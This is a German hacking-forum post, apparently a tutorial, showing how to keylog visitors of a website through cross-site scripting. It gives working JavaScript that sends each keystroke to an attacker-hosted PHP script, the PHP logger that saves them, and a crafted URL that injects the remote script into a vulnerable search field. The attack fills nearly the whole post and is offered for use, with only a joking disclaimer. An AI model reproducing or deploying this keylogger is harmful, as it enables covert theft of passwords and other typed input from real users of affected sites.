Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Keylogger per XSS by Iron

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
Iron

Iron

    Lehrling

  • Premium Member
  • Likes
    45
  • 94 Beiträge
  • 94 Bedankt
  • Android
  • Windows, Linux
Keylogger per XSS

Ich hafte für nichts und distanziere mich von jeglichen Schaden der durch dieses Tutorial entsteht ;)

Ich möchte euch in diesem kleinen Tutorial zeigen wie man einen Benutzer per XSS keyloggen kann. Falls ihr euch noch nicht richtig mit XSS beschäftigt habt empfehle ich euch erst andere Tutorials zu lesen.

Vorbereitungen

Wir brauchen einen Web-Hoster diesen Hoster brauchen wir um 2 Skripte hochzuladen ein PHP & Javascript und einen FTP-Client. Das Javascript Skript zum keyloggen und das PHP Skript zum speichern des Logs. Gibt allen Files die permission 777 für die Schreibrechte.

Javascript-Skript
document.onkeypress = function(evt) {
evt = evt || window.event;
key = String.fromCharCode(evt.charCode);
if (key) {
var http = new XMLHttpRequest();
var param = encodeURI(key);
http.open("POST", "WEBHOSTER+PHPSKRIPT");
http.setRequestHeader("Content-type", application/x-www-form-urlencoded");
http.send("key="+param);
}
}
In Zeile 7 muss die URL angegeben werden wo ihr euer PHP-Skript hochgeladen habt.

PHP-Skript
<?php
$key = $_POST["key"];
$logfile = "log.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>

Fast fertig

Jetzt modifiziert ihr eure URL

www.beispielSeiteMitXSSLücke.de/index.php?search=<script src="URL_DER_Javascript_DATEI"></script>

Die Logs sind nur auf dem Formular mit der XSS-Lücke. Alle Tastenanschläge werden in der "logs.txt" auf dem Web-Hoster gespeichert.

MFG Iron

---------------------------------------------------------------------------------------------
Quellen: http://www.toolbase....__hl__keylogger
Javascript-Keylogger
  • PaulaAbdul, Xenio und Caruso gefällt das
Eingefügtes Bild
Graphics by Flex.Net

Thanked by 1 Member:
Xenio


  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 74 user(s)


    , adn1337, AFK_D4m4ge, alkoven, and6578, B1nary, Bad Grandpa, bebekid32, blue_eyed_devil, Born2Hack, buffer-overflow, Caruso, chaos666, cheatmo, corkscrew, Crowx88, CyberFlash, Das, Dean36, dervonheute, Dr. Spic, easysurfer, El.Nexiz, fakkerbizz, FalkE, Framerater, gutzuu, hessel, hikhack7, INTERSPACECOWBOY, Iron, jinx, Juri, kennydark, kiwitone, L0rdz, lowbob, massa, max, mega_looser123, midn84ever, most_uniQue, mxtrn, NewHacker, nibble nibble, nong_dan, Omnipräsent, PaulaAbdul, paulaner, peppi200, ping-exit, prto, Rennsteak, robin5798, Scrilla, shuffle, Silent0wn3r, smc2014, Sp33dy, Syorack, TEST, thunfisch, Tinoindahouse, trueseller, Unkiii, w1p3, Xenio, Xenos88, xl3iitches, xXNightiXx, zepsus, zer0devide, ziggyx, zxyc
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.